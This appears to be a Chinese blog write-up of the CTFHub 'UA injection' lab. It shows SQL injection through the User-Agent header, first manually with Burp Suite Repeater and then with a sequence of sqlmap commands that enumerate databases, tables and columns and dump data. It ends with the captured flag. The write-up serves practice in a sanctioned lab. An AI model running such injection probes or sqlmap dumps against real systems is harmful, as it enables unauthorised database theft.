CTFHub-UA注入-wp

UA注入

方法一:手注

  • 使用BurpSuite进行截断,并使用Repeater改包

在这里插入图片描述

​ 如图所示,对User-Agent处进行修改,点击Go之后页面出现变化

  • 输入1+1 ,页面返回 id=2 说明存在字符型注入漏洞

  • 使用 1 order by … 测试得字段数为2

  • 如图,开始注入,爆出库名
    在这里插入图片描述

  • 爆出表名

在这里插入图片描述

  • 爆出列名

在这里插入图片描述

  • 爆出数据,拿到flag

在这里插入图片描述

ctfhub{5ba8fd44460a9858b2ba1510}

方法二:sqlmap

使用指令

python sqlmap.py -u "..." --level=3 -dbs

爆出库名

python sqlmap.py -u "..." --level=3 -D sqli -tables

python sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -columns

python sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -C yubmizjeqy -dump

拿到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值